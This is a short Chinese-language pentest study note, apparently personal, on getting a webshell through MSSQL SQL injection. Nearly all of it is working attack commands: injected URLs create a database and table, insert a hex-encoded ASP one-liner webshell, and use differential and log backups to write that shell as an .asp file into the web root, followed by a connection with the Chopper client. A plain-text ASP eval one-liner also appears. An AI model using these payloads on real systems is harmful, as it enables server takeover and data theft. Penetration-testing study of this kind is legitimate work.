任務二 注入點拿shell
路徑的爆破
https://blog.csdn.net/edu_aqniu/article/details/78409451
0X01判斷 是否為判斷當前數據庫用戶名是否為DB_OWNER:
是
Mssql拿shell有兩種方法 win2008sever里面
0X02數據庫備份拿shell
0X001 創建自己的數據庫
http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong;
0X002先進行一次完整備份:
?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli';
0X003使用數據庫:
http://www.aspx-sqli.com/index.asp?id=1;use%20zhong;
0x004創建新表:在數據庫名為中的庫里面創建一個新的cmd表
create table [dbo].[zhong] ([cmd] [image]);
0X006向cmd表中插入數據
?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E);
0X007進行數據庫的差異備份
?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT;
然后菜刀連接
0X03log備份拿shell
0X001 激活為還原模式
這里要注意的是我們通過備份拿shell 要注意是需要進行數據庫的
LOG備份需要先把指定的數據庫激活為還原模式,所以需要執行alter database XXX set RECOVERY FUL,而差異備份不需要,所以只有這條語句的就是LOG備份
?id=1;alter database asp_test set RECOVERY FULL –
0X002創建新的表cmd
?id=1;create table cmd (a image) –
0X003備份當前庫的log到網站根目錄
?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init –
0X004在cmd表的a列中插入一句話
insert into cmd (a) values ('<%%25Execute(request("go"))% %25>')--
0X005備份差異log
;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' --
0x006 菜刀連接
----致謝 卿哥
https://www.cnblogs.com/-qing-/p/10364190.html
帶我們一點一點了解滲透
學習之路 少就是多 慢就是快